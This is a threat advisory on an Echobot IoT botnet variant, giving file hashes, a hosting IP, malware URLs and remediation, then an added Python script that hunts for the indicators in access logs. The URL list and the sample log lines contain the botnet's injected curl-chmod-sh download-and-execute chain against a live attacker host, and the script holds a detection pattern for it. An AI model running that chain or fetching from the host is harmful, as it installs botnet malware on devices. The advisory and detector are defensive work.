December 13, 2019
Severity
High
Analysis Summary
Echobot has evolved with a new variant that carries 77 remote code execution exploits. The exploits in the current version target products ranging from routers, IP cameras, VoIP phones, presentation systems, smart home hubs, software, data analytics platforms, biometric scanners, network-attached storage systems and thermal cameras. In the latest campaign, Echobot was delivered from 10 different, previously compromised devices, which sheds light on its propagation mechanism; the binaries themselves, however, are all hosted at a single IP address. The malware dropper sits on an open server in a file named richard (see the URL list below).
The exploit set spans more than a decade of security flaws, disclosed between 2009 and 2019, in IoT devices and enterprise applications. Indicators of compromise are listed below.
Impact
- Remote Code Execution
- Information Disclosure
Indicators of Compromise
MD5
- ed581940bb7f2b71464aaad369287984
- f2ea49f82e7ae974ffd35b2fe1734d03
- 838b5b379c4397fe98ec42d0c0032e1b
- 93f5dff8de6dd346551ca90d24f7a668
- 9e60e4da9451ef63345866705347bdc9
- 546004af0e64b6603bcb9d884044812d
- 8e15730e51dd13b2adfbd2ef5959a27f
- d5d5baf740648d3b1ee5108383176e4c
- fdc326246c0df7c4e80d920866b2613e
- 6592eae817483acd41a2a6d748b4cc7d
- 0b3ca8d7cb83c400596cad8c3643b07c
- 555371d7426a5cdc96d1f1bf9b1d1487
- 501dd0cc90f289296033ecadaa62604f
SHA-256
- a96515f745f07be9a512a2d0502c59b5ee2ef8d14ff0adaab3558e97d616c017
- 6a58e30de7842d7c30398c24395ae02762b8b7e3598bb8d2915299ee6bee7b02
- 9d0dc6705ca42183ebe0fa766d453ee90d68e38b6d6cf5745cf550ea5f2b372c
- 4ccb9683182b2c8512b12ffa1dbdf22dbad8e5cbc3bb9efb85fe3c6f2b19cba3
- 0e87d4a97b64beb7fe27e0b21d73eb0da353467d99710566dda8b07f953798ef
- db4a5bf82bffa1a5c4444facbdbf4f1c6938a7e0227c9740b3780c8659802cc0
- 1f23ddd77881a8cc95587b91c91fcf71175efafafd9b5b08c12a7e81c18ff378
- c93f08a29512132ba8ac44092613fe6a8e9e192c8155cbbd62b28823b718f7e7
- 23ff9c0f3baab717c9753604235a1069c15a5fd9b2f1a626889d7e56186dbe48
- f7568d22f7cb83f5587ced9eac15c850ea9f0a552252fe40c38369e9b17d21b7
- a88db9f571efca3adc9ca1f6958369ff41722148ac222ec47afe8bfba004988a
- c8992488a49544762eababe5cfbf5304b770c48cd5e8ae47aa71d3a013c114af
- ef5fcc5391f580ed91745b0678ee4c605e65bde3fad5e434f89372445f9a5a64
Source IP
145.249.106[.]241
URL
- http[:]//145.249.106.241/ECHOBOT.mips
- https[:]//145.249.106.241/
- http[:]//145.249.106.241/riohard
- http[:]//145.249.106.241/richard;%20curl%20-O%20
- http[:]/145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard
- http[:]//145.249.106.241/richard;%20chmod%20%20x%20richard;%20sh%20richard
- http[:]//145.249.106.241/ECHOBOT.mpsl
- http[:]//145.249.106.241/richard;chmod%20xrichard;shrichard
- http[:]//145.249.106.241/ECHOBOT.arm
- http[:]//145.249.106.241/ECHOBOT.i686
- http[:]//145.249.106.241/ECHOBOT.m68k
- http[:]//145.249.106.241/echobot.arm4
- http[:]//145.249.106.241/echobot.arm
- http[:]//145.249.106.241/echobot.mpsl
- http[:]//145.249.106.241/ECHOBOT.spc
Remediation
- Block the threat indicators at their respective controls: the hosting IP and URLs at the perimeter firewall and egress proxy, and the MD5/SHA-256 hashes at endpoint protection.
- Keep all IoT devices, enterprise applications and other products patched against known security vulnerabilities. The exploit set covers flaws disclosed between 2009 and 2019, so any device that has not been updated in years is a likely target.
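As an added example, not part of the Rewterz advisory, the script below turns the indicators above into a small hunting check: it parses web-server or proxy access log lines, percent-decodes the requested target (the injected payloads in the URL list are URL-encoded), and flags any request that contacts the hosting IP, names one of the ECHOBOT.*/richard files, or carries the "curl -O ...; chmod +x richard; sh richard" download-and-execute chain. It also matches an MD5 or SHA-256 digest from an EDR or file-inventory export against the hash list. The log lines are constructed for illustration; the indicator values are copied from the advisory.

```python
import re
from urllib.parse import unquote

# Indicators copied from the advisory above.
ECHOBOT_HOST = "145.249.106.241"
ECHOBOT_MD5 = {
    "ed581940bb7f2b71464aaad369287984", "f2ea49f82e7ae974ffd35b2fe1734d03",
    "838b5b379c4397fe98ec42d0c0032e1b", "93f5dff8de6dd346551ca90d24f7a668",
    "9e60e4da9451ef63345866705347bdc9", "546004af0e64b6603bcb9d884044812d",
    "8e15730e51dd13b2adfbd2ef5959a27f", "d5d5baf740648d3b1ee5108383176e4c",
    "fdc326246c0df7c4e80d920866b2613e", "6592eae817483acd41a2a6d748b4cc7d",
    "0b3ca8d7cb83c400596cad8c3643b07c", "555371d7426a5cdc96d1f1bf9b1d1487",
    "501dd0cc90f289296033ecadaa62604f",
}
ECHOBOT_SHA256 = {
    "a96515f745f07be9a512a2d0502c59b5ee2ef8d14ff0adaab3558e97d616c017",
    "6a58e30de7842d7c30398c24395ae02762b8b7e3598bb8d2915299ee6bee7b02",
    "9d0dc6705ca42183ebe0fa766d453ee90d68e38b6d6cf5745cf550ea5f2b372c",
    # extend with the remaining SHA-256 values from the list above
}

# File names served from the Echobot host (per the URL list). "richard" alone is a
# weak indicator; it is only meaningful together with the host or the exec chain.
PAYLOAD_NAME = re.compile(
    r"\b(?:echobot\.(?:mips|mpsl|arm4?|i686|m68k|spc)|richard|riohard)\b", re.I)
# The injected stage-one chain: fetch a file, chmod it, run it with sh.
EXEC_CHAIN = re.compile(r"\b(?:curl|wget)\b.*\bchmod\b.*\bsh\s+\S+", re.I)
# Request line of an Apache/nginx combined log or a proxy log with absolute URLs.
REQUEST = re.compile(r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"')


def decode_target(target: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_request(target: str) -> list:
    """Return the list of reasons a request target looks like Echobot activity."""
    decoded = decode_target(target)
    reasons = []
    if ECHOBOT_HOST in decoded:
        reasons.append("contacts Echobot hosting IP")
    if PAYLOAD_NAME.search(decoded):
        reasons.append("references Echobot payload name")
    if EXEC_CHAIN.search(decoded):
        reasons.append("carries download-and-execute chain")
    return reasons


def scan_log(lines) -> list:
    """Return (line_number, decoded_target, reasons) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((n, decode_target(m.group("target")), reasons))
    return hits


def is_known_hash(digest: str) -> bool:
    """Match an MD5 (32 hex) or SHA-256 (64 hex) digest, e.g. from an EDR export."""
    d = digest.strip().lower()
    if len(d) == 32:
        return d in ECHOBOT_MD5
    if len(d) == 64:
        return d in ECHOBOT_SHA256
    return False


# Constructed sample lines (not real traffic): an inbound exploit attempt carrying
# the injected chain, an outbound proxy fetch of the MIPS binary, and a benign hit.
SAMPLE_LOG = [
    '203.0.113.9 - - [13/Dec/2019:10:01:02 +0000] "GET /cgi-bin/admin.cgi?cmd=curl%20-O%20'
    'http://145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [13/Dec/2019:10:02:30 +0000] "GET http://145.249.106.241/ECHOBOT.mips HTTP/1.1" 200 65536 "-" "Wget"',
    '10.0.0.7 - - [13/Dec/2019:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, target, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(reasons)}\n    {target}")
    print("hash match:", is_known_hash("ED581940BB7F2B71464AAAD369287984"))
```

Run it against a real access log with `scan_log(open("access.log"))`; the decode step matters because the injected chain arrives percent-encoded (and sometimes double-encoded) inside a query string, so a plain substring match on the raw line misses it.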